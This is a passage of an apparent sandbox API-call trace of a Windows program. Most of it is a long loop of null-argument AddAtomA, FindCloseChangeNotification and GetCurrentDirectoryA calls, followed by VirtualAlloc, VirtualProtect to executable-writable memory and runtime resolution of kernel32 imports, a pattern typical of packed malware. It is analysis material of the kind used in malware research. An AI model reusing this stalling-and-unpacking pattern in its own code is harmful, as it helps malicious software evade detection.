(lpString=0x0) returned 0x0 [0080.864] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.864] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.864] AddAtomA (lpString=0x0) returned 0x0 [0080.864] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.864] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.865] AddAtomA (lpString=0x0) returned 0x0 [0080.865] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.865] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.865] AddAtomA (lpString=0x0) returned 0x0 [0080.865] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.865] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.865] AddAtomA (lpString=0x0) returned 0x0 [0080.865] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.865] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.865] AddAtomA (lpString=0x0) returned 0x0 [0080.865] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.865] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.865] AddAtomA (lpString=0x0) returned 0x0 [0080.865] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.865] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.865] AddAtomA (lpString=0x0) returned 0x0 [0080.865] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.865] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.865] AddAtomA (lpString=0x0) returned 0x0 [0080.865] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.865] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.866] AddAtomA (lpString=0x0) returned 0x0 [0080.866] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.866] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.866] AddAtomA (lpString=0x0) returned 0x0 [0080.866] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.866] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.866] AddAtomA (lpString=0x0) returned 0x0 [0080.866] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.866] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.866] AddAtomA (lpString=0x0) returned 0x0 [0080.866] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.866] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.866] AddAtomA (lpString=0x0) returned 0x0 [0080.866] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.866] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.866] AddAtomA (lpString=0x0) returned 0x0 [0080.866] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.866] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.866] AddAtomA (lpString=0x0) returned 0x0 [0080.867] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.867] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.867] AddAtomA (lpString=0x0) returned 0x0 [0080.867] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.867] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.867] AddAtomA (lpString=0x0) returned 0x0 [0080.867] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.867] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.867] AddAtomA (lpString=0x0) returned 0x0 [0080.867] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.867] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.867] AddAtomA (lpString=0x0) returned 0x0 [0080.867] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.867] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.867] AddAtomA (lpString=0x0) returned 0x0 [0080.867] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.867] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.867] AddAtomA (lpString=0x0) returned 0x0 [0080.868] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.868] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.868] AddAtomA (lpString=0x0) returned 0x0 [0080.868] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.868] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.868] AddAtomA (lpString=0x0) returned 0x0 [0080.868] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.868] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.868] AddAtomA (lpString=0x0) returned 0x0 [0080.868] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.868] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.868] AddAtomA (lpString=0x0) returned 0x0 [0080.868] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.868] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.868] AddAtomA (lpString=0x0) returned 0x0 [0080.868] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.868] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.868] AddAtomA (lpString=0x0) returned 0x0 [0080.868] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.868] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.868] AddAtomA (lpString=0x0) returned 0x0 [0080.868] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.868] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.869] AddAtomA (lpString=0x0) returned 0x0 [0080.869] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.869] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.869] AddAtomA (lpString=0x0) returned 0x0 [0080.869] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.869] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.869] AddAtomA (lpString=0x0) returned 0x0 [0080.869] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.869] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.869] AddAtomA (lpString=0x0) returned 0x0 [0080.869] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.869] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.869] AddAtomA (lpString=0x0) returned 0x0 [0080.869] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.869] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.869] AddAtomA (lpString=0x0) returned 0x0 [0080.869] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.869] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.869] AddAtomA (lpString=0x0) returned 0x0 [0080.869] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.869] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.869] AddAtomA (lpString=0x0) returned 0x0 [0080.869] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.869] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.870] AddAtomA (lpString=0x0) returned 0x0 [0080.870] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.870] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.870] AddAtomA (lpString=0x0) returned 0x0 [0080.870] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.870] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.870] AddAtomA (lpString=0x0) returned 0x0 [0080.870] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.870] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.870] AddAtomA (lpString=0x0) returned 0x0 [0080.870] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.870] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.870] AddAtomA (lpString=0x0) returned 0x0 [0080.870] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.870] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.870] AddAtomA (lpString=0x0) returned 0x0 [0080.870] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.870] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.870] AddAtomA (lpString=0x0) returned 0x0 [0080.870] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.870] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.870] AddAtomA (lpString=0x0) returned 0x0 [0080.870] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.870] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.870] AddAtomA (lpString=0x0) returned 0x0 [0080.871] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.871] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.871] AddAtomA (lpString=0x0) returned 0x0 [0080.871] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.871] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.871] AddAtomA (lpString=0x0) returned 0x0 [0080.871] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.871] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.871] AddAtomA (lpString=0x0) returned 0x0 [0080.871] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.871] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.871] AddAtomA (lpString=0x0) returned 0x0 [0080.871] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.871] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.871] AddAtomA (lpString=0x0) returned 0x0 [0080.871] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.871] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.871] AddAtomA (lpString=0x0) returned 0x0 [0080.871] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.871] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.871] AddAtomA (lpString=0x0) returned 0x0 [0080.871] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.872] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.872] AddAtomA (lpString=0x0) returned 0x0 [0080.872] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.872] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.872] AddAtomA (lpString=0x0) returned 0x0 [0080.872] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.872] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.872] AddAtomA (lpString=0x0) returned 0x0 [0080.872] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.872] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.872] AddAtomA (lpString=0x0) returned 0x0 [0080.872] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.872] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.872] AddAtomA (lpString=0x0) returned 0x0 [0080.872] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.872] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.872] AddAtomA (lpString=0x0) returned 0x0 [0080.872] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.872] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.872] AddAtomA (lpString=0x0) returned 0x0 [0080.872] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.872] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.873] AddAtomA (lpString=0x0) returned 0x0 [0080.873] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.873] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.873] AddAtomA (lpString=0x0) returned 0x0 [0080.873] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.873] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.873] AddAtomA (lpString=0x0) returned 0x0 [0080.873] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.873] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.873] AddAtomA (lpString=0x0) returned 0x0 [0080.873] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.873] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.873] AddAtomA (lpString=0x0) returned 0x0 [0080.873] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.873] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.873] AddAtomA (lpString=0x0) returned 0x0 [0080.873] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.873] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.873] AddAtomA (lpString=0x0) returned 0x0 [0080.873] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.873] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.873] AddAtomA (lpString=0x0) returned 0x0 [0080.873] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.873] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.874] AddAtomA (lpString=0x0) returned 0x0 [0080.874] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.874] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.874] AddAtomA (lpString=0x0) returned 0x0 [0080.874] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.874] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.874] AddAtomA (lpString=0x0) returned 0x0 [0080.874] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.874] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.874] AddAtomA (lpString=0x0) returned 0x0 [0080.874] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.874] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.874] AddAtomA (lpString=0x0) returned 0x0 [0080.874] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.874] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.874] AddAtomA (lpString=0x0) returned 0x0 [0080.874] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.924] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.924] AddAtomA (lpString=0x0) returned 0x0 [0080.924] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.924] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.924] AddAtomA (lpString=0x0) returned 0x0 [0080.924] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.925] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.925] AddAtomA (lpString=0x0) returned 0x0 [0080.925] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.925] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0080.950] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0080.951] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualAlloc") returned 0x76e21856 [0080.951] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualProtect") returned 0x76e2435f [0080.951] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualFree") returned 0x76e2186e [0080.951] GetProcAddress (hModule=0x76e10000, lpProcName="GetVersionExA") returned 0x76e23519 [0080.951] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateProcess") returned 0x76e3d802 [0080.952] GetProcAddress (hModule=0x76e10000, lpProcName="ExitProcess") returned 0x76e27a10 [0080.952] GetProcAddress (hModule=0x76e10000, lpProcName="SetErrorMode") returned 0x76e21b00 [0080.952] SetErrorMode (uMode=0x400) returned 0x0 [0080.952] SetErrorMode (uMode=0x0) returned 0x400 [0080.952] GetVersionExA (in: lpVersionInformation=0x18e550*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}5w") | out: lpVersionInformation=0x18e550*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0080.952] VirtualAlloc (lpAddress=0x0, dwSize=0x2d200, flAllocationType=0x1000, flProtect=0x4) returned 0x2b0000 [0080.957] VirtualProtect (in: lpAddress=0x400000, dwSize=0x32000, flNewProtect=0x40, lpflOldProtect=0x18f5d8 | out: lpflOldProtect=0x18f5d8*=0x2) returned 1 [0081.051] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.094] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76e10000 [0081.094] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0081.094] GetProcAddress (hModule=0x76e10000, lpProcName="WriteFile") returned 0x76e21282 [0081.094] GetProcAddress (hModule=0x76e10000, lpProcName="FlushFileBuffers") returned 0x76e2469b [0081.094] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0081.094] GetProcAddress (hModule=0x76e10000, lpProcName="CreateProcessA") returned 0x76e21072 [0081.094] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcpyW") returned 0x76e43102 [0081.094] GetProcAddress (hModule=0x76e10000, lpProcName="CreateProcessW") returned 0x76e2103d [0081.094] GetProcAddress (hModule=0x76e10000, lpProcName="WaitForSingleObject") returned 0x76e21136 [0081.094] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileW") returned 0x76e23f5c [0081.095] GetProcAddress (hModule=0x76e10000, lpProcName="lstrlenA") returned 0x76e25a4b [0081.095] GetProcAddress (hModule=0x76e10000, lpProcName="WideCharToMultiByte") returned 0x76e2170d [0081.095] GetProcAddress (hModule=0x76e10000, lpProcName="MultiByteToWideChar") returned 0x76e2192e [0081.095] GetProcAddress (hModule=0x76e10000, lpProcName="GetCommandLineW") returned 0x76e25223 [0081.095] GetProcAddress (hModule=0x76e10000, lpProcName="WriteConsoleW") returned 0x76e47aca [0081.095] GetProcAddress (hModule=0x76e10000, lpProcName="SetFilePointerEx") returned 0x76e3c807 [0081.095] GetProcAddress (hModule=0x76e10000, lpProcName="GetConsoleMode") returned 0x76e21328 [0081.095] GetProcAddress (hModule=0x76e10000, lpProcName="DeleteFileA") returned 0x76e25444 [0081.095] GetProcAddress (hModule=0x76e10000, lpProcName="HeapReAlloc") returned 0x77361f6e [0081.095] GetProcAddress (hModule=0x76e10000, lpProcName="HeapSize") returned 0x77353002 [0081.095] GetProcAddress (hModule=0x76e10000, lpProcName="GetProcessHeap") returned 0x76e214e9 [0081.095] GetProcAddress (hModule=0x76e10000, lpProcName="LCMapStringW") returned 0x76e217b9 [0081.095] GetProcAddress (hModule=0x76e10000, lpProcName="GetStringTypeW") returned 0x76e21946 [0081.096] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileType") returned 0x76e23531 [0081.096] GetProcAddress (hModule=0x76e10000, lpProcName="SetStdHandle") returned 0x76ea454f [0081.096] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcatA") returned 0x76e42b7a [0081.096] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcpyA") returned 0x76e42a9d [0081.096] GetProcAddress (hModule=0x76e10000, lpProcName="GetEnvironmentVariableA") returned 0x76e233a0 [0081.096] GetProcAddress (hModule=0x76e10000, lpProcName="GetShortPathNameA") returned 0x76e4594d [0081.096] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleFileNameA") returned 0x76e214b1 [0081.096] GetProcAddress (hModule=0x76e10000, lpProcName="GetConsoleCP") returned 0x76ec7bff [0081.096] GetProcAddress (hModule=0x76e10000, lpProcName="SetLastError") returned 0x76e211a9 [0081.096] GetProcAddress (hModule=0x76e10000, lpProcName="FreeEnvironmentStringsW") returned 0x76e251cb [0081.096] GetProcAddress (hModule=0x76e10000, lpProcName="GetEnvironmentStringsW") returned 0x76e251e3 [0081.096] GetProcAddress (hModule=0x76e10000, lpProcName="GetCommandLineA") returned 0x76e251a1 [0081.097] GetProcAddress (hModule=0x76e10000, lpProcName="GetCPInfo") returned 0x76e25189 [0081.097] GetProcAddress (hModule=0x76e10000, lpProcName="GetOEMCP") returned 0x76e4d1a1 [0081.097] GetProcAddress (hModule=0x76e10000, lpProcName="IsValidCodePage") returned 0x76e24493 [0081.097] GetProcAddress (hModule=0x76e10000, lpProcName="UnhandledExceptionFilter") returned 0x76e4772f [0081.097] GetProcAddress (hModule=0x76e10000, lpProcName="SetUnhandledExceptionFilter") returned 0x76e287c9 [0081.097] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcess") returned 0x76e21809 [0081.097] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateProcess") returned 0x76e3d802 [0081.097] GetProcAddress (hModule=0x76e10000, lpProcName="IsProcessorFeaturePresent") returned 0x76e25235 [0081.097] GetProcAddress (hModule=0x76e10000, lpProcName="QueryPerformanceCounter") returned 0x76e21725 [0081.097] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcessId") returned 0x76e211f8 [0081.097] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentThreadId") returned 0x76e21450 [0081.098] GetProcAddress (hModule=0x76e10000, lpProcName="GetSystemTimeAsFileTime") returned 0x76e23509 [0081.098] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeSListHead") returned 0x773594a4 [0081.098] GetProcAddress (hModule=0x76e10000, lpProcName="IsDebuggerPresent") returned 0x76e24a5d [0081.098] GetProcAddress (hModule=0x76e10000, lpProcName="GetStartupInfoW") returned 0x76e24d40 [0081.098] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleW") returned 0x76e234b0 [0081.098] GetProcAddress (hModule=0x76e10000, lpProcName="RtlUnwind") returned 0x76e4d1c3 [0081.098] GetProcAddress (hModule=0x76e10000, lpProcName="RaiseException") returned 0x76e258a6 [0081.098] GetProcAddress (hModule=0x76e10000, lpProcName="GetLastError") returned 0x76e211c0 [0081.098] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0081.098] GetProcAddress (hModule=0x76e10000, lpProcName="EnterCriticalSection") returned 0x773422b0 [0081.099] GetProcAddress (hModule=0x76e10000, lpProcName="LeaveCriticalSection") returned 0x77342270 [0081.099] GetProcAddress (hModule=0x76e10000, lpProcName="DeleteCriticalSection") returned 0x773545f5 [0081.099] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76e21916 [0081.099] GetProcAddress (hModule=0x76e10000, lpProcName="TlsAlloc") returned 0x76e249ad [0081.099] GetProcAddress (hModule=0x76e10000, lpProcName="TlsGetValue") returned 0x76e211e0 [0081.099] GetProcAddress (hModule=0x76e10000, lpProcName="TlsSetValue") returned 0x76e214fb [0081.099] GetProcAddress (hModule=0x76e10000, lpProcName="TlsFree") returned 0x76e23587 [0081.099] GetProcAddress (hModule=0x76e10000, lpProcName="FreeLibrary") returned 0x76e234c8 [0081.099] GetProcAddress (hModule=0x76e10000, lpProcName="GetProcAddress") returned 0x76e21222 [0081.099] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryExW") returned 0x76e2495d [0081.100] GetProcAddress (hModule=0x76e10000, lpProcName="GetStdHandle") returned 0x76e251b3 [0081.100] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleFileNameW") returned 0x76e24950 [0081.100] GetProcAddress (hModule=0x76e10000, lpProcName="ExitProcess") returned 0x76e27a10 [0081.100] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleExW") returned 0x76e24a6f [0081.100] GetProcAddress (hModule=0x76e10000, lpProcName="GetACP") returned 0x76e2179c [0081.100] GetProcAddress (hModule=0x76e10000, lpProcName="HeapAlloc") returned 0x7734e026 [0081.100] GetProcAddress (hModule=0x76e10000, lpProcName="HeapFree") returned 0x76e214c9 [0081.100] GetProcAddress (hModule=0x76e10000, lpProcName="FindClose") returned 0x76e24442 [0081.100] GetProcAddress (hModule=0x76e10000, lpProcName="FindFirstFileExW") returned 0x76e31811 [0081.100] GetProcAddress 